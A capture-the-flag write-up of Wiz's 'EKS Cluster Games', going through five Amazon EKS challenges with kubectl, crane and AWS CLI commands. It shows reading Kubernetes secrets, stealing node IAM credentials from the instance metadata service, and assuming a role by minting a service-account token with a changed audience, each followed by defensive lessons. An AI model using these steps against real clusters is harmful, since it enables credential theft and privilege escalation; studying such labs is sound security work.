Just had a go at the “EKS Cluster Games,” a captivating CTF challenge by Wiz. This unique Amazon EKS challenge offers a great opportunity to deepen your understanding of running Kubernetes on AWS. It’s a hands-on experience simulating real-world scenarios, aimed at educating and challenging participants. So let me take you through my journey of cracking it, where the mission was to uncover and understand common security issues in Amazon EKS. Let’s dive into how I tackled it!
By clicking on “Begin Challenge” we are presented with a terminal and the first challenge.
Challenge 1: Secret Seeker
Viewing the permissions, we find that we have both list and get permissions for the Secret resource. For those acquainted with Kubernetes, the list permission lets us enumerate existing resources, while the get permission lets us read the contents of a specific resource.
From here we can use kubectl get secrets and then kubectl get secrets log-rotate to find the flag.
As the flag is Base64 encoded, we can decode it to get the first flag.
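As a rough sketch, the lookup and decode can be combined into one pipeline. Note that the secret’s data key name (flag) is an assumption here; the real key name is whatever kubectl get secrets log-rotate -o yaml shows:

```shell
# Read one key from the named secret and base64-decode its value.
# The data key "flag" is a guess; check the secret's YAML for the real key.
kubectl get secret log-rotate -o jsonpath='{.data.flag}' | base64 -d
```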
Highlights
- Access to Kubernetes Secrets demands stringent control. These resources house crucial data such as passwords and tokens, making it vital to manage access meticulously for enhanced security.
- The scenario underscores the importance of routinely auditing permission settings in Kubernetes. This practice guarantees that access levels stay fitting and sensitive information is adequately shielded.
- Having list and get permissions on sensitive resources, like Secrets, is potent. It serves as a reminder to handle these permissions with care to safeguard critical data.
Challenge 2: Registry Hunt
The challenge description indicates that we should focus on registries.
So first we check the permissions
We see that we don’t have the list permission for Secrets, so we can only read a secret if we already know its name. We do, however, have list and get permissions for pods, so we use kubectl get pods to identify them.
We extract the YAML configuration of the database-pod-2c9b3a4e to see if it contains some useful info.
kind: Pod
metadata:
  annotations:
    kubernetes.io/psp: eks.privileged
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:32:05Z"
  name: database-pod-2c9b3a4e
  namespace: challenge2
  resourceVersion: "12166896"
  uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6
spec:
  containers:
  - image: eksclustergames/base_ext_image
    imagePullPolicy: Always
    name: my-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-cq4m2
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  imagePullSecrets:
  - name: registry-pull-secrets-780bab1d
  nodeName: ip-192-168-21-50.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-cq4m2
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2023-12-07T19:54:26Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2023-11-01T13:32:05Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://8010fe76a2bcad0d49b7d810efd7afdecdf00815a9f5197b651b26ddc5de1eb0
    image: docker.io/eksclustergames/base_ext_image:latest
    imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623
    lastState:
      terminated:
        containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af
        exitCode: 0
        finishedAt: "2023-12-07T19:54:25Z"
        reason: Completed
        startedAt: "2023-11-01T13:32:08Z"
    name: my-container
    ready: true
    restartCount: 1
    started: true
    state:
      running:
        startedAt: "2023-12-07T19:54:26Z"
  hostIP: 192.168.21.50
  phase: Running
  podIP: 192.168.12.173
  podIPs:
  - ip: 192.168.12.173
  qosClass: BestEffort
In this data we find the name of a secret, registry-pull-secrets-780bab1d, so let’s take a look at it.
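A sketch of reading that secret directly. The .dockerconfigjson key is an assumption based on it being the standard data key for image-pull secrets of type kubernetes.io/dockerconfigjson:

```shell
# Extract the embedded docker config from the pull secret and decode it.
kubectl get secret registry-pull-secrets-780bab1d \
  -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d
```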
We can see some base64-encoded data, so let’s decode it.
By decoding the data we get the registry name and credentials. As Docker is not installed, we will use the crane utility mentioned in the challenge description.
Now we can try to pull the Docker image we identified in database-pod-2c9b3a4e to our /tmp directory.
After extracting it, we see there are some more tar files, so let’s take a look at them, starting with the smaller one.
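The extraction steps can be sketched as below. The tarball name /tmp/image.tar and the layer filename are assumptions; the real layer names come from whatever crane pull wrote out:

```shell
# Unpack the pulled image tarball, then inspect the layer archives inside it.
mkdir -p /tmp/image
tar -xf /tmp/image.tar -C /tmp/image      # /tmp/image.tar: assumed output of crane pull
ls -lhS /tmp/image                        # size-sorted, so the smaller layer stands out
layer=/tmp/image/SMALLEST_LAYER.tar.gz    # placeholder for the actual layer name
tar -tf "$layer" | grep flag.txt          # list the layer's contents
```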
We can see a file called flag.txt, so let’s check it out.
Highlights
- Using Secrets for Docker registry authentication is crucial for keeping containers safe. It makes sure only authorized access happens to private registries, preventing any unauthorized downloading of images. Also, it’s important to stick to private registries in Kubernetes setups. This helps steer clear of potential security issues and gives better control over your software resources.
Challenge 3: Image Inquisition
The first step is to check what permissions are available to us. We can do that by clicking the view permissions button or by using kubectl auth can-i --list.
As we can see our permissions are limited to list and get pods.
The next step is to enumerate which pods are running.
There is only one pod running, so moving further let’s check its YAML config.
root@wiz-eks-challenge:~# kubectl get pod -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: Pod
  metadata:
    annotations:
      kubernetes.io/psp: eks.privileged
      pulumi.com/autonamed: "true"
    creationTimestamp: "2023-11-01T13:32:10Z"
    name: accounting-pod-876647f8
    namespace: challenge3
    resourceVersion: "12166911"
    uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2
  spec:
    containers:
    - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
      imagePullPolicy: IfNotPresent
      name: accounting-container
      resources: {}
      terminationMessagePath: /dev/termination-log
      terminationMessagePolicy: File
      volumeMounts:
      - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
        name: kube-api-access-mmvjj
        readOnly: true
    dnsPolicy: ClusterFirst
    enableServiceLinks: true
    nodeName: ip-192-168-21-50.us-west-1.compute.internal
    preemptionPolicy: PreemptLowerPriority
    priority: 0
    restartPolicy: Always
    schedulerName: default-scheduler
    securityContext: {}
    serviceAccount: default
    serviceAccountName: default
    terminationGracePeriodSeconds: 30
    tolerations:
    - effect: NoExecute
      key: node.kubernetes.io/not-ready
      operator: Exists
      tolerationSeconds: 300
    - effect: NoExecute
      key: node.kubernetes.io/unreachable
      operator: Exists
      tolerationSeconds: 300
    volumes:
    - name: kube-api-access-mmvjj
      projected:
        defaultMode: 420
        sources:
        - serviceAccountToken:
            expirationSeconds: 3607
            path: token
        - configMap:
            items:
            - key: ca.crt
              path: ca.crt
            name: kube-root-ca.crt
        - downwardAPI:
            items:
            - fieldRef:
                apiVersion: v1
                fieldPath: metadata.namespace
              path: namespace
  status:
    conditions:
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:10Z"
      status: "True"
      type: Initialized
    - lastProbeTime: null
      lastTransitionTime: "2023-12-07T19:54:29Z"
      status: "True"
      type: Ready
    - lastProbeTime: null
      lastTransitionTime: "2023-12-07T19:54:29Z"
      status: "True"
      type: ContainersReady
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:10Z"
      status: "True"
      type: PodScheduled
    containerStatuses:
    - containerID: containerd://665178aaf28ddd6d73bf88958605be9851e03eed9c1e61f1a1176a69719191f2
      image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
      imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
      lastState:
        terminated:
          containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe
          exitCode: 0
          finishedAt: "2023-12-07T19:54:28Z"
          reason: Completed
          startedAt: "2023-11-01T13:32:11Z"
      name: accounting-container
      ready: true
      restartCount: 1
      started: true
      state:
        running:
          startedAt: "2023-12-07T19:54:29Z"
    hostIP: 192.168.21.50
    phase: Running
    podIP: 192.168.5.251
    podIPs:
    - ip: 192.168.5.251
    qosClass: BestEffort
    startTime: "2023-11-01T13:32:10Z"
kind: List
metadata:
  resourceVersion: ""
In the YAML config we find the image ID, which tells us that this pod uses AWS ECR as its container registry:
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
Let’s check if we have access to the instance metadata service.
It seems we do have access to the metadata, so the next logical step is to enumerate further.
This gives us the name of the IAM role associated with the instance and we can use the command
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
to get temporary security credentials.
We are only able to curl the instance metadata service because we are running inside a compromised EKS pod, hence the reminder in the description. From here we use these credentials to set the AWS environment variables for temporary security credentials.
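Put together, the metadata walk and the variable setup look roughly like this. This is a sketch: jq is assumed to be available (it is used later in the challenge terminal), and the JSON field names are the standard IMDS credential fields:

```shell
# 1. Discover the role attached to the node, 2. fetch its temporary credentials,
# 3. export them so the AWS CLI picks them up.
BASE=http://169.254.169.254/latest/meta-data/iam/security-credentials
ROLE="$(curl -s "$BASE/")"
CREDS="$(curl -s "$BASE/$ROLE")"
export AWS_ACCESS_KEY_ID="$(echo "$CREDS" | jq -r .AccessKeyId)"
export AWS_SECRET_ACCESS_KEY="$(echo "$CREDS" | jq -r .SecretAccessKey)"
export AWS_SESSION_TOKEN="$(echo "$CREDS" | jq -r .Token)"
```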
We can now leverage the environment variables we just set to get the password required to authenticate.
Now we have all the pieces, so let’s use the crane utility to log in.
Let’s check the contents of the config file.
We find the flag for challenge 3 of the EKS cluster games in the config file.
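The login and inspection steps above can be sketched as follows. The registry host comes from the image ID in the pod spec; crane config prints the image’s config JSON, which is where the flag was sitting. The exact command sequence is an assumption:

```shell
# Authenticate to ECR with the node's temporary credentials, then dump the image config.
aws ecr get-login-password \
  | crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
```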
Highlights
- Uncovering Valuable Insights from EC2 Instance Metadata: In cloud setups, especially within AWS, tapping into EC2 instance metadata provides a wealth of information, including essential AWS credentials. It’s crucial to control and observe access to EC2 instance metadata. Enable IMDSv2 and deploy IAM roles for EC2 instances for dynamic and secure credential management.
- Emphasizing the Significance of Clean Image Layers: Refrain from leaving confidential data, particularly credentials, within image layers or histories. Implement policies for scanning and managing images to identify and eliminate sensitive information. Educate developers on the best practices for creating and maintaining images.
Challenge 4: POD Break
Let’s check what permissions we have using kubectl auth can-i --list.
We find ourselves with no permissions. The next step is to check if IMDSv1 is enabled, as it opens a pathway to extract EC2 metadata, which can hold valuable data.
It seems we still have access to the IMDSv1 endpoint and can directly use the node’s IAM role. Upon further inspection we find that the environment variables still hold the credentials from the previous challenge.
We now also know that the cluster name appears to be “eks-challenge-cluster”. So instead of poking around AWS, let’s first try to use the node IAM role to access the Kubernetes API. To do this we need to create an aws-iam-authenticator token, which we can do with
TOKEN="$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r .status.token)"
Now let’s use this identity to enumerate further. Checking the permissions, we see that we have list and get permissions for Secrets, so let’s take a look.
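A sketch of that enumeration, passing the minted token explicitly via kubectl’s --token flag (the exact commands here are an assumption; the get-token line is the one from the challenge):

```shell
# Mint a token for the node role's cluster identity, then call the API with it.
TOKEN="$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r .status.token)"
kubectl --token "$TOKEN" auth can-i --list
kubectl --token "$TOKEN" get secrets -o yaml
```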
Inside the secrets we find our base64-encoded flag, which can be decoded to get the flag.
Highlights
- Managing Tokens Securely and Permission Considerations: The utilization of aws eks get-token underscores the critical need for meticulous token management. It is imperative to handle tokens, especially those endowed with significant permissions, securely. This practice is essential to thwart any unauthorized access attempts and maintain the integrity of cluster resources.
- IAM’s Integral Role in Kubernetes Security: The convergence of AWS IAM roles and Kubernetes highlights the intricacies involved in access management. Grasping the nuances of IAM role assumptions within Amazon EKS is paramount for establishing robust access controls and mitigating the risks of privilege escalation. Understanding and implementing secure IAM practices contribute significantly to overall Kubernetes security.
Challenge 5: Container Secrets Infrastructure
Straightaway we start by checking the information provided to us, that is:
- IAM policy
- Trust Policy
- Permissions
The challenge description tells us that we need to acquire the AWS role of the s3access-sa service account. Let’s list all service accounts to check if our target account is among them.
As our target is present, let’s enumerate a bit more and see what it holds.
Looking at the s3access service account, we observe that it is annotated with the ARN of the IAM role we need to assume.
arn:aws:iam::688655246681:role/challengeEksS3Role
From the permissions we know that we can create service account tokens as debug-sa, so let’s use the created token in conjunction with the aws sts assume-role-with-web-identity command to try to get access.
This gave an error. Analysing the JWT token, we find that the audience was set to "aud": ["https://kubernetes.default.svc"]. We need to get past the audience check, so we use the create token command again, but this time with the audience set to sts.amazonaws.com, which we got from the trust policy.
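The corrected attempt can be sketched as below. The role ARN is the one from the service account annotation; the session name (challenge5) is an arbitrary choice of mine:

```shell
# Mint a token whose audience matches the trust policy, then retry the assume call.
TOKEN="$(kubectl create token debug-sa --audience sts.amazonaws.com)"
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role \
  --role-session-name challenge5 \
  --web-identity-token "$TOKEN"
```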
In order to make sure the audience is set correctly, we check the token again.
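One way to check a token’s audience locally is to decode the JWT payload, which is the second dot-separated, base64url-encoded field. A small helper sketch:

```shell
# Print the payload of a JWT. base64url uses the -_ alphabet and strips '='
# padding, so translate the alphabet and restore the padding before decoding.
jwt_payload() {
  p="$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')"
  while [ $(( ${#p} % 4 )) -ne 0 ]; do p="${p}="; done
  printf '%s' "$p" | base64 -d
}
# usage: jwt_payload "$TOKEN"   # then look at the "aud" claim
```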
We see that it is set to the correct audience, so we can try to assume the role with web identity again, and voilà, we get the AWS credentials for the s3access-sa service account.
We can now use these credentials to set up environment variables.
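A sketch of that setup, assuming the JSON printed by the assume call was saved in $OUT. Note the STS response nests the credentials under Credentials and calls the token SessionToken, unlike the flat IMDS format:

```shell
# $OUT holds the JSON output of aws sts assume-role-with-web-identity.
export AWS_ACCESS_KEY_ID="$(echo "$OUT" | jq -r .Credentials.AccessKeyId)"
export AWS_SECRET_ACCESS_KEY="$(echo "$OUT" | jq -r .Credentials.SecretAccessKey)"
export AWS_SESSION_TOKEN="$(echo "$OUT" | jq -r .Credentials.SessionToken)"
```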
With this we are now authenticated as a different user. Using this identity we can get the flag stored in challenge-flag-bucket-3ff1ae2/flag.
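Retrieving the object can be sketched with the AWS CLI (the local path /tmp/flag is an arbitrary choice):

```shell
# Copy the flag object out of the bucket named in the challenge, then print it.
aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag /tmp/flag
cat /tmp/flag
```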
Highlights
- The ability to generate tokens for service accounts, exemplified by the debug-sa case, can serve as a significant avenue for elevating privileges within Kubernetes setups. A malicious actor holding such permissions may potentially adopt roles with broader access than originally assigned, resulting in unauthorized activities.
- Significance of Trust Policies in IAM: This obstacle underscores the critical role of Trust Policies in AWS IAM. These policies dictate which entities can take on a role, and any misconfigurations can expose the system to security vulnerabilities, such as unauthorized entry or role assumption.
- Token Audience Verification: The challenge encountered with token audience highlights the necessity for stringent verification mechanisms in identity tokens. It is crucial to ensure that tokens are issued to and utilized by their intended audience to prevent misuse.
- Understanding IAM Role Associations in Kubernetes: This scenario emphasizes the importance of comprehending how IAM roles align with Kubernetes service accounts. Misinterpreting these associations can lead to security oversights, particularly in intricate cloud-native environments.